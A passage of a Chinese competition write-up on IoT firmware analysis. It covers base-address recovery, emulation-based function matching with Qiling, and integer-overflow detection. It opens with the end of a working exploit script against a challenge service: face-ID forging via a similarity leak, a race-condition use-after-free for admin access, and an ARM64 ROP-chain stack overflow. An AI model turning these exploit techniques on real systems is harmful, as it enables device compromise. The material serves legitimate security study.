    elif action == "info":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/file/info", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "read":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/file/read", body, session_id)
        ret_data = p.recv()
        p.close()
    elif action == "rename":
        body = f"ext_id={kwargs['ext_id']}&new_filename={kwargs['new_filename']}".encode()
        p = make_post_request("/api/secfs/file/rename", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "update":
        body = f"ext_id={kwargs['ext_id']}&data={kwargs['data']}".encode()
        p = make_post_request("/api/secfs/file/update", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "slots":
        p = make_post_request("/api/secfs/file/slots", b"", session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    else:
        return None
    return ret_data
    
def secfs_dir_man(action: str, session_id: str, **kwargs):
    print(f"[*] secfs_dir_man: action [{action}] with args [{kwargs}]")
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if action == "create":
        body = f"parent_id={kwargs['parent_id']}&dir_name={kwargs['dir_name']}".encode()
        p = make_post_request("/api/secfs/dir/create", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "delete":
        body = f"ext_id={kwargs['ext_id']}&rm_mode={kwargs['rm_mode']}".encode()
        p = make_post_request("/api/secfs/dir/delete", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "info":
        body = f"ext_id={kwargs['ext_id']}".encode()
        p = make_post_request("/api/secfs/dir/info", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()      
    else:
        return None
    return ret_data
    
def forge_face_id(size:int):
    fake_face = [0.0 for _ in range(size)]
    rounds = 0
    total_max = 0.0
    delta = 0.025
    burp_range = 20
    while True:
        for i in range(size):
            local_max = 0.0
            max_index = 0
            for j in range(-burp_range, burp_range):
                rounds += 1
                fake_face[i] = j * delta
                print(fake_face)
                curr = leak_similarity(fake_face)
                if curr >= local_max:
                    local_max = curr
                    max_index = j
                else:
                    break
            fake_face[i] = max_index * delta
            total_max = leak_similarity(fake_face)
            time.sleep(0.01)
        if total_max > 0.85:
            print("Success!")
            break
        else:
            print("Fail!")
            return None
    print(f"Final similarity = {total_max}, rounds = {rounds}")
    return fake_face


class MyThread(threading.Thread):
    def __init__(self, func, args=()):
        super(MyThread, self).__init__()
        self.func = func
        self.args = args
    def run(self):
        self.result = self.func(*self.args)
    def get_result(self):
        threading.Thread.join(self)
        try:
            return self.result
        except Exception:
            return None

def race_and_uaf(session_id):
    uaf_face_data = [1.0]*128
    uaf_face_data[88] = struct.unpack("<d", b"user"+p32(2333))[0]
    uaf_face_data[89] = struct.unpack("<d", p64(0))[0]
    uaf_face_data[90] = struct.unpack("<d", b"AAAABBBB")[0]
    
    eqqie_session = session_id
    disable_user(eqqie_session, "guest")
    reset_user(eqqie_session, "guest")
    enable_user(eqqie_session, "guest")
    guest_session = login_by_passwd("guest", "password")
    print("guest_session:", guest_session)
    usable_session = None
    for _ in range(500):
        ta = MyThread(func=disable_user, args=(eqqie_session, "guest"))
        tb = MyThread(func=login_by_passwd, args=("guest", "password"))
        ta.start()
        tb.start()
        ta.join()
        tb.join()
        guest_session = tb.get_result() 
        if guest_session:
            if(test_race_resule(guest_session) == 2):
                usable_session = guest_session
                print("Race success:", usable_session)
                reset_user(eqqie_session, "guest")
                reset_user(eqqie_session, "guest", uaf_face_data)
                break
        enable_user(eqqie_session, "guest")
    if not usable_session:
        print("Race fail!")
        return
    json_data = user_info(usable_session)
    if json_data:
        if json_data['data']['type'] == 'admin':
            print("UAF success!")
            return usable_session
        else:
            print('UAF Fail!')
            return None
    else:
        print("no json data!")
        return None
   
def name_stkof(session_id):
    for i in range(127):
        json_ret = secfs_dir_man("create", session_id, dir_name=f"dir_{i}", parent_id=0)
        json_ret = json.loads(json_ret.decode())
        if(json_ret['code'] == 0):
            secfs_dir_man("delete", session_id, ext_id=json_ret['data']['ext_id'], rm_mode='recur')
        else:
            continue
    secfs_file_man("slots", session_id)
    
    flag_str = 0x409E58
    perm_val = 0x1F6
    chmod_got = 0x41AEC8
    gadget1 = 0x409D88
    gadget2 = 0x409D68

    rop = p64(gadget1)+b"x"*0x30
    rop += p64(0xdeadbeef) + p64(gadget2)   # x29       x30
    rop += p64(0) + p64(1)                  # x19       x20
    rop += p64(chmod_got) + p64(flag_str)   # x21       x22(w0)
    rop += p64(perm_val) + p64(0xdeadbeef)  # x23(x1)   x24

    payload1 = "a"*(0x214)+"b"*len(rop) # occupy file data to expand file name size
    json_ret = secfs_file_man("create", session_id, filename=f"vuln_file", data=payload1, parent_id=0)
    json_ret = json.loads(json_ret.decode())
    secfs_file_man("rename", session_id, ext_id=json_ret['data']['ext_id'], new_filename="A"*128)
    payload2 = "a"*(0x214)+quote(rop)
    secfs_file_man("update", session_id, ext_id=json_ret['data']['ext_id'], data=payload2)
    secfs_file_man("info", session_id, ext_id=json_ret['data']['ext_id'])

def exp():
    # step 1
    fake_face = forge_face_id(128)
    print("fake face id:", fake_face)
    eqqie_session = login_by_face(fake_face)
    print("eqqie_session:", eqqie_session)
    # step 2
    admin_session = race_and_uaf(eqqie_session)
    print("admin_session:", admin_session)
    # step 3
    name_stkof(admin_session)
    # read_flag
    os.system(f"curl http://{ip}:{port}/flag.txt")
    
if __name__ == "__main__":
    exp()

无经验新手队伍的writeup,轻喷

一、固件基地址识别

1.1 题目要求

image-20221210205440900

1.2 思路

  • 一般对于一个完整的 RTOS 设备固件而言,通常可以通过解压固件包并在某个偏移上搜索到内核加载基址的信息,参考:[RTOS] 基于VxWorks的TP-Link路由器固件的通用解压与修复思路 。但是赛题1给的是若干个不同厂商工具链编译的 RTOS 内核 Image,无法直接搜索到基址信息;
  • 内核 Image 中虽然没有基址信息,但是有很多的绝对地址指针(pointer)和 ASCII 字符串(string),而字符串相对于 Image Base 的偏移量是固定的,所以只有选取正确的基址值时,指针减去基址才能得到正确的 ASCII 字符串偏移;

    • 即需要满足如下关系:pointer_value - image_base = string_offset
  • 所以实现方式大致为:

    • 检索所有的字符串信息,并搜集string_offset
    • 按照目标架构的size_t长度搜集所有的pointer_value
    • 按照一定步长遍历image_base,计算所有image_base 取值下string_offset的正确数量,并统计出正确数量最多的前几个候选image_base输出
  • 在此基础上可以增加一些优化措施,比如可以像 rbasefind2 一样通过比较子字符串差异以获得image_base候选值,这样就不需要从头遍历所有的image_base,速度更快

1.3 实现

1.3.1 相关工具

基于 soyersoyer/basefind2sgayou/rbasefind 项目以及 ReFirmLabs/binwalk 工具实现

  • rbasefind 主要提供了3个控制参数:搜索步长,最小有效字符串长度以及端序
  • binwalk 用于通过指令比较的方式检查 Image 文件的架构和端序
  • 通过多次调整步长和字符串长度参数进行 rbasefind,可以得到可信度最高的 Image Base 值,将其作为答案提交

1.3.2 脚本

import os
import sys
import subprocess

chall_1_data_path = "../dataset/1"

file_list = os.listdir(chall_1_data_path)

vxworks = {15, 21, 36, 37, 44, 45, 49}
ecos = {4, 2, 30, 49, 18, 45, 33, 5, 20, 32, 43}
answer = {}

def get_default_answer(data_i):
    if int(data_i) in vxworks:
        return hex(0x40205000)
    elif int(data_i) in ecos:
        return hex(0x80040000)
    else:
        return hex(0x80000000)

def check_endian(path):
    out, err = subprocess.Popen(
        f"binwalk -Y \'{path}\'", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
    # print(out)
    if b", little endian, " in out:
        return "little"
    elif b", big endian, " in out:
        return "big"
    else:
        return "unknown"

if __name__ == "__main__":
    #file_list = ["2", "5"]
    cnt = 0
    for file in file_list:
        cnt += 1
        print(f"[{cnt}/{len(file_list)}] Processing file: {file}...")
        file_path = os.path.join(chall_1_data_path, file)
        endian = check_endian(file_path)

        if endian == "little":
            cmd = f"./rbase_find -o 0x100 -m 10 \'{file_path}\' 2>/dev/null | sed -n \"1p\""
        elif endian == "big":
            cmd = f"./rbase_find -o 0x100 -m 10 -b \'{file_path}\' 2>/dev/null | sed -n \"1p\""
        elif endian == "unknown":
            cmd = f"./rbase_find -o 0x100 -m 10 \'{file_path}\' 2>/dev/null | sed -n \"1p\""

        try:
            out, err = subprocess.Popen(
                cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
        except Exception as e:
            # error
            print(f"Rbase file \'{file_path}\' failed with:", e)
            answer[file] = get_default_answer(file)
            continue

        out = out.decode().strip()
        print(f"File {file_path} done with:", out)
        colsep = out.split(":")
        if len(colsep) != 2:
            answer[file] = get_default_answer(file)
            continue
        # success
        base_address = colsep[0].strip()
        base_address = hex(int(base_address, 16))
        print(f"Add '{file}:{base_address}\' => answer")
        answer[file] = base_address
    # sort answer
    answer = dict(sorted(answer.items(), key=lambda item: int(item[0])))

    with open("rbase_answer.txt", "w") as f:
        for key, value in answer.items():
            f.write(f"{key}:{value}\n")

二、函数符号恢复

2.1 题目要求

image-20221210214501730

2.2 思路

从题目要求来看应该是比较经典的二进制匹配问题了,相关工具和公开的思路都不少。最开始看到题目我们就有了如下两种思路。

2.2.1 Binary Match

第一种是传统的 静态二进制匹配 方式,提取目标函数的 CFG 特征或者 sig 等信息,将其与无符号二进制中的函数进行比较,并输出匹配结果的可信度。由于尝试了几个现成的工具后发现效果不尽人意,暂时也没想到优化措施,就暂时搁置了这个思路。

后续和 C0ss4ck 师傅交流了一下,他是通过魔改的 Gencoding 以及大量提取各种各样 Glibc 中的函数特征而实现的二进制匹配。一开始效和我分数差不多,但是后来他针对性的提取了很多特殊 RTOS 工具链构建出来的 kernel 的函数特征,效果突飞猛进,相关特征库也已经开源:Cossack9989/BinFeatureDB: Binary Feature(ACFG) Database for DataCon2022-IoT-Challenge-2 (github.com)

2.2.2 Emulated Match

第二种是通过 动态模拟执行 来匹配函数。这个思路是比赛时想到的,之前没有见过相关工具,也没有阅读过相关资料,直觉上觉得效果会不错,而且很有挑战性,于是着手尝试实现这个思路。

2.2.2.1 概要

  • 前期准备:

    • 测试用例:为要匹配的所有函数设计输入和输出用例
    • 函数行为:为一些该函数特有的访存行为定义回调函数,如memcpymemcpy会对两个指针参数指向的地址进行访存
    • 系统调用:监控某些函数会使用的系统调用,如recv, recvmsgsendsendto 等socket函数依赖于某些底层调用
  • 提取出函数的起始地址,为该函数建立上下文(context),拍摄快照(snapshot)并保存,添加回调函数,进入预执行状态
  • 在预执行状态下完成参数传递等工作
  • 开始模拟执行,执行结束后会触发返回点上的回调,进入检查逻辑。通过检查测试用例、函数行为以及系统调用等特征是否符合预期,返回匹配结果
  • 恢复快照(restore),继续匹配下一个目标函数,循环往复
  • 输出某个起始地址上所成功匹配的所有目标函数(不一定唯一)

2.3 实现

2.3.1 基本架构

image-20221211020353459

图画得稍微有点不清楚的地方,Snapshot 在一个 Test Case 中只执行一次,往后只完成 Args Passing 就行,懒得改了...
  • 这是我们实现的基于模拟执行的函数符号恢复工具的基本架构,由 BinaryMatch 和 Solver 两部分组成:

    • BinaryMatch 负责遍历加载目标文件,构建出可的模拟执行对象,并请求 Solver 匹配目标函数
    • Solver 则是使用模拟执行的方式,将运行结果和预期结果作比较,判断是否匹配。而与一般匹配方式不同的是,不需要提前编译并搜集函数特征库,但是需要手动实现某个函数的 matcher

2.3.2 BinaryMatch 类

  • 首先将待匹配的无符号 ELF 文件导入 IDA 或者 Radare2 等反编译软件,导出函数列表(其中包含函数的入口地址)和基址信息

    • 由于题目强调了基址不同时以 IDA 为准,这里绕了点弯使用 IDA 导出的结果
ida_res_file = os.path.join(ida_res_dir, f"{file_r_n}_ida_res.txt")
with open(ida_res_file, "r") as f:
    ida_res = json.loads(f.read())
    bin = BinaryMatch(
        file_path, func_list=ida_res["func_list"], base=ida_res["image_base"])
    res[file_path] = bin.match_all()
  • 将函数列表和 ELF 文件作为参数构造一个 BinaryMatch 对象,该对象负责组织针对当前 ELF 的匹配工作:

    • 识别 ELF 架构和端序,选用指定参数去创建一个 Qiling 虚拟机对象,用于后续模拟执行

      _archtype = self._get_ql_arch()
      _endian = self._get_ql_endian()
      if _archtype == None or _endian == None:
          self.log_warnning(f"Unsupported arch {self.arch}-{self.bit}-{self.endian}")
          return False
      
      ...
      
      ql = Qiling(
          [self.file_path], 
          rootfs="./fake_root",
          archtype=_archtype, endian=_endian, ostype=QL_OS.LINUX, 
          #multithread=True
          verbose=QL_VERBOSE.DISABLED
          #verbose=QL_VERBOSE.DEBUG
      )
      entry_point = ql.loader.images[0].base + _start - self.base
      exit_point = ql.loader.images[0].base + _end - self.base
      • 由于某些 ELF 编译所用的工具链比较特殊导致 Qiling 无法自动加载,需要单独处理,是一个瓶颈
    • 遍历 BinaryMatch 类中默认的或用户指定的匹配目标(Target),使用注册到 BinaryMatch 类上的对应架构的 Solver 创建一个 solver 实例,调用其中的 solve 方法发起匹配请求:

      • 如:一个 x86_64 小端序的 ELF 会请求到 Amd64LittleSolver.solve()

        ...
        "amd64": {
                    "64": {
                        "little": Amd64LittleSolver
                    }
                }
        ...
      • 每次请求可以看成传递了一个3元组:(虚拟机对象, 欲匹配函数名, 待匹配函数入口)

        solver = self._get_solver()
        res = solver.solve(ql, target, entry_point, exit_point) # solve
        • exit_point 暂时没有作用,可忽略
    • 返回匹配结果

2.3.3 Solver 类

  • Solver.solve() 方法

    def solve(self, ql: Qiling, target: str, _start: int, _end: int):
        self._build_context(ql)
    
        matcher = self._matchers.get(target, None)
        if matcher == None:
            self.log_warnning(f"No mather for \"{target}()\"")
            return False
    
        _test_cases = self._get_test_cases(target)
        if _test_cases == None:
            self.log_warnning(f"No test cases for {target}!")
            return False
    
        _case_i = 0
        # Snapshot: save states of emulator
        ql_all = ql.save(reg=True, cpu_context=True,
                            mem=True, loader=True, os=True, fd=True)
        ql.log.info("Snapshot...")
        for case in _test_cases:
            _case_i += 1
            # global hooks
            self._set_global_hook(ql, target, _start, _end)
            # match target funtion
            if not matcher(ql, _start, _end, case):
                self.log_warnning(f"Test Case {_case_i}/{len(_test_cases)} failed!")
                return False
            # Resume: recover states of emulator
            ql.clear_hooks()
            # note that it can not unmap the mapped memory. Fuck you Qiling! It is a shit bug!
            ql.restore(ql_all)
            ql.log.info("Restore...")
            self.log_success(f"Test Case {_case_i}/{len(_test_cases)} passed!")
    
        return True
  • 调用 Solver.solve() 方法后,开始构建函数运行所需的上下,文这些上下文信息包括:

    def _build_context(self, ql: Qiling):
        # Due to Qiling's imperfect implementation of Hook, it's like a piece of shit here
        mmap_start = self._default_mmap_start
        mmap_size = self._default_mmap_size
        
        # Prevent syscall read
        def null_read_impl(ql: Qiling, abi: int, length: int, flags: int, sig: int):
            self.log_warnning("Ingnore syscall READ!")
            return 0
        ql.os.set_syscall('read', null_read_impl, QL_INTERCEPT.CALL)
        # Prevent syscall setrlimit
        def null_setrlimit_impl(ql: Qiling, abi: int, length: int, flags: int, sig: int):
            self.log_warnning("Ingnore syscall SETRLIMIT!")
            return 0
        
        ql.os.set_syscall('setrlimit', null_setrlimit_impl, QL_INTERCEPT.CALL)       
        # args buffer
        ql.mem.map(mmap_start, mmap_size, UC_PROT_ALL)
        # return point
        ql.mem.map(self._default_return_point, 0x1000, UC_PROT_ALL)
    • 参数内存:为即将可能要使用的指针类型的参数(如:char *buf)创建对应的缓冲区 ql.mem.map(mmap_start, mmap_size, UC_PROT_ALL)
    • 返回点:通过 map 方法开辟一段 RWX 内存,将其作为返回地址写入到返回地址寄存器或将返回地址压入中,后续只要统一在这个地址上注册 Hook 就可以在函数退出时自动触发;
    • 系统调用:屏蔽一些可能会发生异常或者导致执行流阻塞的系统调用。如: setrlimit 可能会导致进程资源受限而被系统 kill 掉,以及对 STDIN 的 read 调用可能会阻塞当前线程;
    • 其它:特定于某些架构上的问题可以通过重写 _build_context 方法进行补充完善。如:x86_64 下需要直接调用底层 Unicorn 接口给 UC_X86_REG_FS_BASE 寄存器赋值,防止访问 TLS 结构体时出现异常;
  • 上下文构造完毕后,进入 预执行 状态,在这个状态下调用快照功能将 Qiling Machine 的状态保存下来。因为一个目标函数的测试用例可能有好几个,使用快照可以防止用例间产生干扰,并且避免了重复构建上下文信息
  • 调用 _set_global_hook 设置全局 hook,主要是便于不同架构下单独进行 debug 调试

    def _set_global_hook(self, ql: Qiling, target: str, _start: int, _end: int):
        def _code_hook(ql: Qiling, address: int, size: int, md: Cs):
            _insn = next(md.disasm(ql.mem.read(address,size), address, count=1))
            _mnemonic = _insn.mnemonic
            _op_str = _insn.op_str
            _ins_str = f"{_mnemonic} {_op_str}"
            self.log_warnning(f"Hook <{hex(address)}: {_ins_str}> instruction.")      
        ql.hook_code(_code_hook, user_data=ql.arch.disassembler)
        return
    借助 _set_global_hook 实现简单的调试功能,检查执行出错的指令
  • 检查类的内部是否实现了名为 _match_xxxx 的私有方法,其中 xxxx 是待匹配目标函数的名称,如 strlen 对应 _match_strlen。如果有实现该方法则取出作为 matcher 传入 Qiling Machine,函数地址,测试用例,并等待返回匹配结果

    matcher = self._matchers.get(target, None)
    ...
    if not matcher(ql, _start, _end, case):
        self.log_warnning(f"Test Case {_case_i}/{len(_test_cases)} failed!")
        return False

    _match_strlen 为例,一个 matcher 的实现逻辑大致如下:

    def _match_strlen(self, ql: Qiling, entry_point: int, exit_point: int, case):
        match_result = False
        # 需要注册一个_return_hook到返回点上
        def _return_hook(ql: Qiling) -> None:
            nonlocal match_result
            nonlocal case
            # check output
            assert self._type_is_int(case["out"][0])
            if case["out"][0].data == self._get_retval(ql)[0]:
                match_result = True
            ql.stop()
        ql.hook_address(_return_hook, self._default_return_point)
        self._pass_args(ql, case["in"])
        self._run_emu(ql, entry_point, exit_point)
        return match_result

    有一些函数涉及到缓冲区访问,或者会将结果保存到缓冲区中,实现上则更麻烦,如 _match_memcmp

    def _match_memcmp(self, ql: Qiling, entry_point: int, exit_point: int, case):
        match_result = False
        _dest_mem_read = False
        _dest_mem_addr = self._get_arg_buffer_ptr(0)
        _src_mem_read = False
        _src_mem_addr = self._get_arg_buffer_ptr(1)
        _mem_size = self._default_buffer_size
        _cmp_len = case["in"][2].data
        # memcmp() function must read this two mem
        def _mem_read_hook(ql: Qiling, access: int, address: int, size: int, value: int):
            nonlocal _dest_mem_read, _src_mem_read
            nonlocal _dest_mem_addr, _src_mem_addr
            nonlocal _mem_size
            if access == UC_MEM_READ:
                if address >= _dest_mem_addr and address < _dest_mem_addr + _mem_size:
                    _dest_mem_read = True
                if address >= _src_mem_addr and address < _src_mem_addr + _mem_size:
                    _src_mem_read = True
            return
        _hook_start = self._default_mmap_start
        _hook_end =_hook_start + self._default_mmap_size
        ql.hook_mem_read(_mem_read_hook, begin=self._default_mmap_start, end=_hook_end)
        def _return_hook(ql: Qiling) -> None:
            nonlocal match_result
            nonlocal case
            _dst_buffer = case["in"][0].data
            _src_buffer = case["in"][1].data
            # Check whether the buffer is accessed
            if _dest_mem_read and _src_mem_read:
                # check memory consistency
                if case["in"][0].data == self._get_arg_buffer(ql, 0, len(case["in"][0].data)) and\
                    case["in"][1].data == self._get_arg_buffer(ql, 1, len(case["in"][1].data)):
                    # check memcmp result
                    if _dst_buffer[:_cmp_len] == _src_buffer[:_cmp_len]:
                        if self._get_retval(ql)[0] == 0:
                            match_result = True
                        else:
                            match_result = False
                    else:
                        if self._get_retval(ql)[0] != 0:
                            match_result = True
                        else:
                            match_result = False                            
            ql.stop()
    
        ql.hook_address(_return_hook, self._default_return_point)
        self._pass_args(ql, case["in"])
        self._run_emu(ql, entry_point, exit_point)
        return match_result
    • 在 matcher 中会调用 _pass_args 方法,按照预先设置好的参数寄存器传参约定,进行测试用例的参数传递

      def _pass_args(self, ql: Qiling, input: list[EmuData]):
          mmap_start = self._default_mmap_start
          max_buffer_args = self._default_max_buffer_args
          buffer_size = self._default_buffer_size
          buffer_args_count = 0
          _arg_i = 0
          for _arg in input:
              if _arg_i >= len(self._arg_regs):
                  ValueError(
                      f"Too many args: {len(input)} (max {len(self._arg_regs)})!")
              if self._type_is_int(_arg):
                  ql.arch.regs.write(self._arg_regs[_arg_i], _arg.data)
              elif _arg.type == DATA_TYPE.STRING:
                  if buffer_args_count == max_buffer_args:
                      ValueError(
                          f"Too many buffer args: {buffer_args_count} (max {max_buffer_args})!")
                  _ptr = mmap_start+buffer_args_count*buffer_size
                  ql.mem.write(_ptr, _arg.data+b"\x00")  # "\x00" in the end
                  ql.arch.regs.write(self._arg_regs[_arg_i], _ptr)
                  buffer_args_count += 1
              elif _arg.type == DATA_TYPE.BUFFER:
                  if buffer_args_count == self._default_max_buffer_args:
                      ValueError(
                          f"Too many buffer args: {buffer_args_count} (max {self._default_max_buffer_args})!")
                  _ptr = mmap_start+buffer_args_count*buffer_size
                  ql.mem.write(_ptr, _arg.data)
                  ql.arch.regs.write(self._arg_regs[_arg_i], _ptr)
                  buffer_aargs_count += 1
          _arg_i += 1
      目前简单将参数分为了:整数、字符串以及其它缓冲区(包括复杂结构体),未来可以继续扩展
    • 调用 _run_emu 开始运行 Qiling Machine,运行时会不断触发设置好的Hook,此处略过。由于事先将返回地址设置到了一块空内存上,并在这块内存设置了 Return Hook,所以最终停止执行只会有三个原因:执行超时内存错误触发 Return Hook
    • 运行前注册的 _return_hook 其实主要就是起到检查作用,检查测试用例的输入传入未知函数后得到的结果是否符合预期。很多时候函数的返回值并不能说明函数的执行效果。比如memmove函数需要检查 dest 缓冲区是否拷贝了正确的字节;再比如 snprintf 需要模拟格式化字符串输出结果后,再与缓冲区中的字符串作比较。
  • 在 matcher 退出后,需要清空本次测试用例挂上的 Hook,并恢复快照,准备比较下一个测试用例

    for case in _test_cases:
        ...
        ql.clear_hooks()
        ql.restore(ql_all)
        ql.log.info("Restore...")
        self.log_success(f"Test Case {_case_i}/{len(_test_cases)} passed!")

2.3.4 减少 False Positive 思路

  • 近似函数错配:如果将函数视为 $F(x)$,基于模拟执行的函数匹配思路就是将 $y = F(x)$ 中的 $(x, y)$ 对与已知用例进行拟合,其得到的输入输出终究不能完全揭示未知函数的内部结构(如CFG)。所以容易出现在一个未知函数上成功匹配了错误的目标函数,最典型的例子就是在 strcpy 上匹配了 strncpy,在 memcmp 上匹配了 strcmp,于是需要巧妙设计测试用例
  • 特征不明显函数错配:并且类似 memcmp 这一类只返回 true or false 的函数,模拟执行结果很可能和所设计的测试用例恰好匹配,于是需要引入一些 “超参数” 增加判断依据

2.3.4.1 巧妙设计测试用例

  • 给 strcmp 和 memcmp 设置带 \x00 截断的测试用例:

    "memcmp": [
        {
            "in": [
                EmuData(b"A"*0x20, DATA_TYPE.BUFFER),
                EmuData(b"A"*0x20, DATA_TYPE.BUFFER),
                EmuData(0x20, DATA_TYPE.INT32)
            ],
            "out": [
                EmuData(0, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"AAAAaaaa", DATA_TYPE.BUFFER),
                EmuData(b"AAAAAAAA", DATA_TYPE.BUFFER),
                EmuData(0x8, DATA_TYPE.INT32)
            ],
            "out": [
                EmuData(-1, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"aisudhakaisudhak", DATA_TYPE.BUFFER),
                EmuData(b"AAAAAAAAaisudhak", DATA_TYPE.BUFFER),
                EmuData(0x10, DATA_TYPE.INT32)
            ],
            "out": [
                EmuData(-1, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"AAAAAAAA\x00AAAAAAA", DATA_TYPE.BUFFER),
                EmuData(b"AAAAAAAA\x00BBBBBBB", DATA_TYPE.BUFFER),
                EmuData(0x10, DATA_TYPE.INT32)
            ],
            "out": [
                EmuData(-1, DATA_TYPE.INT32)
            ]
        },
    ],
    "strcmp": [
        {
            "in": [
                EmuData(b"A"*0x20, DATA_TYPE.STRING),
                EmuData(b"A"*0x20, DATA_TYPE.STRING),
            ],
            "out": [
                EmuData(0, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"AAAAaaaa", DATA_TYPE.STRING),
                EmuData(b"AAAAAAAA", DATA_TYPE.STRING),
            ],
            "out": [
                EmuData(-1, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"AAAAAAAA\x00AAAAAAA", DATA_TYPE.STRING),
                EmuData(b"AAAAAAAA\x00BBBBBBB", DATA_TYPE.STRING),
            ],
            "out": [
                EmuData(0, DATA_TYPE.INT32)
            ]
        },
    ],
  • 给 atoi 和 strtol 设计带有 base 参数的测试用例,并且在匹配 atoi 前将 base 参数(atoi 本身没有这个参数)对应的寄存器写 0

    "atoi": [
        {
            "in": [
                EmuData(b"12345", DATA_TYPE.STRING)
            ],
            "out": [
                EmuData(12345, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"1923689", DATA_TYPE.STRING)
            ],
            "out": [
                EmuData(1923689, DATA_TYPE.INT32)
            ]
        },
    ],
    "strtoul": [
        {
            "in": [
                EmuData(b"12345", DATA_TYPE.STRING),
                EmuData(0, DATA_TYPE.INT32), # endptr
                EmuData(10, DATA_TYPE.INT32) # base
            ],
            "out": [
                EmuData(12345, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"12345", DATA_TYPE.STRING),
                EmuData(0, DATA_TYPE.INT32), # endptr
                EmuData(16, DATA_TYPE.INT32) # base
            ],
            "out": [
                EmuData(74565, DATA_TYPE.INT32)
            ]
        },
        {
            "in": [
                EmuData(b"0x100", DATA_TYPE.STRING),
                EmuData(0, DATA_TYPE.INT32), # endptr
                EmuData(16, DATA_TYPE.INT32) # base
            ],
            "out": [
                EmuData(256, DATA_TYPE.INT32)
            ]
        },
    ]
    ...
    # Easy to distinguish from strtoul/strtol
    ql.arch.regs.write(self._arg_regs[1], 0xdeadbeef)
    ql.arch.regs.write(self._arg_regs[2], 0xffff)
    ...

2.3.4.2 增加额外的检查

  • 如之前所述,只使用 memcmp 类函数的返回值匹配时误报率较大。解决的思路是增加两个检查:

    • 添加 dest 和 src 缓冲区的内存访问 Hook,保证运行时这两个参数都要被访问到
    • 运行结束后检查 dest 和 src 缓冲区中的值是否不变,memcmp 函数不应该改变这两个缓冲区的值
  • 经过实际测试,增加额外检查后,近似函数导致的误报率大大降低

2.3.5 运行效果

image-20221211034630955

image-20221211034117199

2.4 不足与改进

  1. [指令] 第一个也是最严重的一个不足,直接导致了分数不是很理想。Qiling 模拟执行框架不支持带有 thumb 的 ARM ELF,模拟执行不起来,这直接导致了本次测试集中很多 ARM32 的测试用例无法使用,非常影响分数。如果要解决这一点,目前来说要么等 Qiling 支持 thumb,要么直接换用 QEMU 作为模拟执行的后端。但是 QEMU 的缺点在于构造上下文很麻烦,添加回调不方便,监视和修改内存困难。所以我们在有限时间内还没有更好的解决方案;
  2. [模拟] 某些厂商 RTOS 工具链编译出来的 ELF 文件结构比较奇怪,暂时不知道因为什么原因导致 Qiling 无法直接加载并提示 load_elf_segments 错误。虽然说可以通过手动 map ELF文件到指定的 Base 上,但是这总归是个极大影响使用体验的东西;
  3. [上下文] 模拟执行前的上下文构建无法兼顾到一些只有在程序运行时才设置好的特殊变量,可能导致访存错误,但是本次比赛大部分目标函数的实现都是上下文无关的,所以影响不大,偶尔有一些会需要访问 TLS 结构体的可以通过 unicorn 写相关的寄存器完成;
  4. [扩展] 对每个新的目标函数都要新写一个新的 matcher 和测试用例,希望有办法可以把这个过程自动化,或者说使用一种高度抽象的描述方式,然后运行时转化为 Python 代码;

三、整数溢出检测

3.1 题目要求

image-20221211040023947

3.2 思路

本题难度还是比较大的,要想做好的话需要花不少时间,前期在第一第二题花了不少时间,第三题只能在3天里面极限整了一个仓促的解决方案,最后效果也不尽人意。但是如果继续修改,个人认为还是能产生不错效果。

几个关键的前提:

  • 首先是既然要识别整数溢出,那么“溢出”这个动作就肯定由几类运算指令造成,如:SUB, ADD, SHIFT, MUL;
  • 单独只看一条指令是无法确认是否存在溢出行为,所以要实现这个方案很可能要用到 符号执行 技术,在符号执行期间,对寄存器或内存位置等变量维护成一个符号值,该值中包含最大可表示整数范围。当符号执行过程中,如果发现存在可能的实际值超过了可表示范围,那就将该指令标记为潜在的溢出指令。其中涉及到一些求解动作还需要 z3 求解器完成;
  • 还有一个问题就是 Source 和 Sink,如何知道来自 Source 的输入,会在某指令处发生溢出,最后溢出的值到达 Sink 的哪个参数——这其实是个挺复杂的过程,需要解决的问题很多,其中 污点追踪 就是一个主要难点;
  • 为了便于在不同架构的 ELF 上实现符号执行和污点追踪,需要找一个中间语言(IL)来表示,而 Ghidra 反编译器正好会提供一种叫做 P-code 的 microcode,可以抽象的表示不同架构下各种指令的功能;

基于以上几点考虑,我们决定基于科恩实验室开发的一个比较成熟的漏洞检测框架 KeenSecurityLab/BinAbsInspector 开展具体工作

该框架支持使用 Ghidra 的 headless 模式,利于命令行处理数据。并且提供了P-code visitor,可以通过符号执行的方式遍历 P-code,判断指令中某个操作数是否存在潜在的溢出。还提供了各种自带的 Checker,每个 Checker 对应一种 CWE。当程序分析完成后,该框架就可以调用指定 Checker 分析反编译后的程序:

image-20221211042340505

可以发现其中本身就提供了 CWE190 —— 也就是整数溢出的检测模块,但是非常遗憾的是这个模块实现得较为简单,没有针对漏洞特点进行进一步处理,所以漏报率和误报率都很高。

这是原生的代码实现:

/**
 * CWE-190: Integer Overflow or Wraparound
 */
public class CWE190 extends CheckerBase {

    private static final Set<String> interestingSymbols = Set.of("malloc", "xmalloc", "calloc", "realloc");

    public CWE190() {
        super("CWE190", "0.1");
        description = "Integer Overflow or Wraparound: The software performs a calculation that "
